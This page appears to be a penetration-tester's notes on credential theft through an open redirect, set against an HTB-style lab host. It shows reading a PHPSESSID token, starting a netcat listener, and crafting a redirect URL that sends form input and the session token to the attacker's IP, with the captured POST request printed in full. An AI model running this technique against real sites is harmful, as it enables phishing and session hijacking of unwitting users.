CREDENTIAL THEFT
#craft a malicious URL that appears to be from a legitimate website but redirects users to a phishing page.
#Users might think they’re logging into a real service, but their credentials get stolen
#walk the application
root@oco:~$ BROWSER > {targetSite:port}
...
* submit expected input and identify potential entry points
#open redirect vulnerability
root@oco:~$ BROWSER > {targetSite:port} > F12 > Storage > Cookies > siteCookieValues
Name: PHPSESSID (aka token)
Value: ntrgep8modbid35j2me2thjjjt
* if a token is included in the GET/POST Request, then it must be used as part of the request as it could be a session or anti-CSRF token and, therefore, useful to an attacker.
root@oco:~$ nc -nlvp 4444
root@oco:~$ BROWSER > {targetSite:port}/index.php?url={attackerNetcatListenerIP&Port}&token={tokenValue}
* the target must enter input into any form in order for this to work
- e.g., providing email address on the form, etc
root@oco:~$ nc...
listening on [any] 4444 ...
connect to [10.10.14.35] from (UNKNOWN) [10.10.14.35] 41650
POST / HTTP/1.1
Host: 10.10.14.35:4444
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://oredirect.htb.net/
Content-Type: application/x-www-form-urlencoded
Content-Length: 84
Origin: http://oredirect.htb.net
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Sec-GPC: 1
Priority: u=0, i
email=null%40null.com&recover-submit=Reset+Password&token=ntrgep8modbid35j2me2thjjjt
Last updated